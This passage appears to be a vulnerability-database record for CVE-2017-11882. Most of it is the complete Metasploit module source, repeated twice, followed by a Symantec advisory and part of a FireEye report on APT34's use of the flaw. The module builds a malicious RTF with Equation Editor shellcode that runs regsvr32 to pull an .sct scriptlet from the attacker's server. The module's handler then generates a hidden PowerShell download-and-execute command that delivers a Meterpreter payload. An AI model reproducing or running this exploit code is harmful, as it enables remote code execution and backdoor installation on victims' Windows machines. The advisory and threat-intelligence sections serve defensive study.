8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << 
\"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << 
'00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << 
\"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? 
\"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}, {"lastseen": "2020-10-15T09:46:17", "description": "This module exploits a flaw in the Equation Editor that allows an attacker to execute arbitrary code through crafted RTF files; no user interaction beyond opening the file is required. The vulnerability is caused by the Equation Editor failing to properly handle OLE objects in memory.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n This module exploits a flaw in the Equation Editor that allows an\n attacker to execute arbitrary code through crafted RTF files; no user\n interaction beyond opening the file is required. 
The vulnerability is\n caused by the Equation Editor failing to properly handle OLE objects\n in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = 
retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << 
'0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << 
'0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << 
\"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << 
'00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << 
\"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? 
\"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}], "symantec": [{"lastseen": "2018-03-14T17:01:30", "bulletinFamily": "software", "cvelist": ["CVE-2017-11882"], "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101757", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101757", "type": "symantec", "title": "Microsoft Office CVE-2017-11882 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "description": "Less than a week after Microsoft issued a patch for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.\n\nWe believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. 
We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.\n\nAPT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a [spear phishing campaign](<https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html>) targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>).\n\nIn this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.\n\nThe full report on APT34 is available to our [MySIGHT customer community](<https://www.fireeye.com/products/isight-cyber-threat-intelligence-subscriptions.html>). APT34 loosely aligns with [public reporting related to the group \"OilRig\"](<https://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/>). 
